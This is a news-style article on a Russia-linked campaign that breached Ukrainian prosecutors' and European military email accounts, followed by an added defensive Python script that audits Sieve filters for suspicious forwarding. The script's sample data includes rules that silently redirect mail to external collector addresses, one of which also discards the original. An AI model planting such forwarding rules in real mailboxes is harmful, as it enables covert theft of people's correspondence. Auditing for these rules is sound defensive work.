
Ukrainian Prosecutors Email Breach Exposes a Dangerous Russia-Linked Spy Campaign Across Europe


WASHINGTON — Russia-linked hackers breached more than 170 email accounts belonging to Ukrainian prosecutors and investigators in a campaign that also hit military and government targets in Romania, Greece, Bulgaria and Serbia, according to data reviewed by Reuters, April 15, 2026.

The breach matters because the attackers appear to have exposed parts of their own infrastructure, giving researchers an unusually clear view of how the operation stole credentials, copied emails, captured two-factor authentication data and set up covert mail-forwarding rules to keep collecting intelligence after the initial compromise.

How the Ukrainian prosecutors email breach exposed the wider campaign

In a detailed March 2026 write-up, Ctrl-Alt-Intel said the attackers made a “huge operational blunder” by leaving exposed material that included more than 11,000 stolen emails, more than 240 stolen credential sets, more than 140 forwarding rules and telemetry tied to at least 284 compromised inboxes between September 2024 and March 2026. The group said the same server had been linked to activity stretching back more than 500 days, suggesting the campaign persisted long after earlier warning signs emerged.

The victim list went well beyond local prosecutors. Reuters said the targets included the Specialized Prosecutor’s Office in the Field of Defense, the Asset Recovery and Management Agency, the Prosecutor’s Training Center and at least one senior mailbox tied to the Specialized Anti-Corruption Prosecutor’s Office. Outside Ukraine, the exposed data pointed to at least 67 Romanian Air Force accounts and 27 inboxes managed by Greece’s Hellenic National Defense General Staff, alongside smaller sets tied to Bulgaria and Serbia.

An earlier Hunt.io investigation into the same infrastructure described an exposed Roundcube exploitation toolkit, command-and-control components and operator artifacts consistent with an APT28-style webmail intrusion set. In practice, that meant researchers were not just seeing the aftermath of the intrusions. They were seeing pieces of the toolset used to run them.

Why prosecutors and anti-corruption offices were prime targets

Prosecutors, anti-corruption investigators and asset-recovery officials sit near some of the most sensitive information in wartime Ukraine. Their email can reveal case strategy, seized assets, suspected collaborators, military misconduct allegations and internal friction inside state institutions. Analysts who reviewed the victimology told Reuters the likely goal was to monitor investigations that could expose Russian agents or collect material that could later be used for leverage or disinformation.

What makes this operation especially dangerous is the depth of access it appears to have achieved. The technical reporting suggests the attackers were not limited to reading a few messages. They could harvest saved credentials, exfiltrate inboxes and sent mail, mine contact lists and, in some cases, steal the secrets used to generate time-based one-time passwords. That kind of access can turn a single phishing success into sustained, quiet surveillance.

Russia has repeatedly denied carrying out hacking operations against other countries. In this case, Reuters reported that the Russian embassy in Washington did not respond to requests for comment. Attribution also carries some nuance: Ctrl-Alt-Intel pointed to Fancy Bear, while other researchers cited by Reuters agreed the activity was tied to Moscow even if they did not fully align on the exact subgroup.

The campaign fits a longer pattern

This breach did not emerge in isolation. In May 2024, CERT Polska warned that an APT28 campaign was targeting Polish government institutions, highlighting how official communications in frontline European states were already under pressure.

By May 2025, ESET’s Operation RoundPress report had described a webmail-focused espionage campaign hitting Ukrainian governmental entities and defense-linked targets in Bulgaria and Romania through XSS flaws in platforms such as Roundcube, Horde, MDaemon and Zimbra.

And in July 2025, CERT-UA said APT28 was using Signal-delivered malicious documents against Ukrainian government agencies, showing that the delivery methods were changing even as the targets stayed familiar.

Seen together, those earlier warnings make the Ukrainian prosecutors email breach look less like a one-off incident and more like the continuation of a durable collection effort aimed at the officials, institutions and partner countries most involved in Ukraine’s war effort and internal cleanup.

Why Europe should pay attention

The wider lesson is that ordinary public-sector email remains a strategic weak point. Vulnerable webmail portals, weak session controls and overlooked forwarding rules can give spies access not only to messages, but also to contact networks, investigative planning and diplomatic context. When that access spans Ukrainian prosecutors and military or government accounts in allied states, the intelligence value rises sharply.
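One concrete way to act on the forwarding-rule lesson is to audit every mailbox's filter rules for redirects that send copies of mail outside the organisation. The script below is an added example, not code from the article or from Ctrl-Alt-Intel, Hunt.io or Reuters; it assumes rules are stored as Sieve scripts (the format Roundcube's managesieve plugin writes) and that an administrator has exported one script per mailbox. The sample scripts, the mailbox names and the domains are constructed for illustration.

```python
"""Audit Sieve filter scripts for forwarding rules that could exfiltrate mail.

Added example (assumption: rules are Sieve scripts exported per mailbox,
as Roundcube's managesieve plugin stores them). Sample data is constructed.
"""
import re
from dataclasses import dataclass, field

# Sieve comments: "# ..." to end of line, or "/* ... */" blocks.
COMMENT_RE = re.compile(r"/\*.*?\*/|#[^\n]*", re.S)
# A redirect action, optionally with tagged args such as ":copy" (RFC 3894).
REDIRECT_RE = re.compile(r'\bredirect\b(?P<flags>(?:\s*:\w+)*)\s*"(?P<addr>[^"]+)"')
DISCARD_RE = re.compile(r"\bdiscard\s*;")

# Constructed sample exports: mailbox name -> Sieve script text.
SAMPLE_SCRIPTS = {
    "user_a": (
        'require ["copy"];\n'
        "# keep a copy of anything about the case\n"
        'if header :contains "subject" "anticorruption" {\n'
        '    redirect :copy "archive@mail-backup.example";\n'
        "}\n"
    ),
    "user_b": 'require ["fileinto"];\nif address :is "from" "chief@prosecutor.example" {\n    fileinto "Done";\n}\n',
    "user_c": 'redirect "assistant@prosecutor.example";\n',
    "user_d": 'if true {\n    redirect "collector@example.net";\n    discard;\n}\n',
}

# Domains the organisation owns; anything else is treated as external.
INTERNAL_DOMAINS = {"prosecutor.example"}


@dataclass
class Finding:
    mailbox: str
    target: str
    severity: str
    reasons: list = field(default_factory=list)


def strip_comments(script: str) -> str:
    """Remove Sieve comments so commented-out rules are not flagged."""
    return COMMENT_RE.sub("", script)


def audit_sieve(mailbox: str, script: str, internal_domains: set) -> list:
    """Return one Finding per redirect action in the script."""
    body = strip_comments(script)
    has_discard = bool(DISCARD_RE.search(body))
    findings = []
    for m in REDIRECT_RE.finditer(body):
        addr = m.group("addr").strip()
        domain = addr.rsplit("@", 1)[-1].lower()
        reasons = []
        severity = "info"
        if domain not in internal_domains:
            # External destination: the core exfiltration pattern.
            reasons.append("forwards to external domain " + domain)
            severity = "high"
        else:
            reasons.append("internal forward; confirm it is sanctioned")
        if ":copy" in m.group("flags"):
            # :copy keeps the original in the inbox, so the owner sees nothing odd.
            reasons.append("silent copy (:copy leaves the original in place)")
        if has_discard:
            # A discard alongside a redirect hides the mail from the owner entirely.
            reasons.append("script also discards mail")
            if severity == "info":
                severity = "medium"
        findings.append(Finding(mailbox, addr, severity, reasons))
    return findings


def audit_all(scripts: dict, internal_domains: set) -> dict:
    """Audit every exported script; mailbox -> list of Finding."""
    return {name: audit_sieve(name, text, internal_domains) for name, text in scripts.items()}


if __name__ == "__main__":
    for mailbox, findings in audit_all(SAMPLE_SCRIPTS, INTERNAL_DOMAINS).items():
        for f in findings:
            print(f"[{f.severity}] {f.mailbox} -> {f.target}: {'; '.join(f.reasons)}")
```

Run against a real export, the "high" findings (external destination) are the ones to review first; "silent copy" and "discard" make a rule more likely to be attacker-created, because both are ways of keeping the mailbox owner from noticing that mail is leaving.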

For Ukraine, the immediate story is the compromise of prosecutor and investigator communications. For Europe, the bigger story is that a single exposed server appears to have illuminated a regional spying effort that had been running for months. That is what turns this from a national breach into a continental security story.
